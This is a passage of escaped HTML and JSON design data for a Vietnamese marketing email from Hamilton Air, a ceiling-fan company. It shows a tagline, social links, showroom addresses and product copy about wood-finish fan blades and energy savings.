style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919418531-du-an-tieu-bieu.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"84%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 28px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 4px 4px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:254px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"254\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:254px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":9,\\\"u_column\\\":14,\\\"u_content_text\\\":7,\\\"u_content_image\\\":8,\\\"u_content_button\\\":4,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":5,\\\"u_content_heading\\\":1,\\\"u_content_text_deprecated\\\":3},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921547793-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">G\\u1ed7 t\\u1ef1 nhi\\u00ean | Gi\\u1ea3 v\\u00e2n g\\u1ed7 | G\\u1ed7 \\u00e9p<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"gVPK2KUKnF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 26px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677921240188-tobago.jpg\\\",\\\"width\\\":1000,\\\"height\\\":436},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jeUIW0ap6n\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"C\\u00c1NH G\\u1ed6 T\\u1ef0 NHI\\u00caN CH\\u1ea4T L\\u01af\\u1ee2NG - TU\\u1ef2 CH\\u1eccN \\u0110\\u01af\\u1ee2C M\\u00c0U S\\u1eaeC\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#0c6097\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hv9TUnw-D5\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"13px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true,\\\"body\\\":false},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5oC, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng 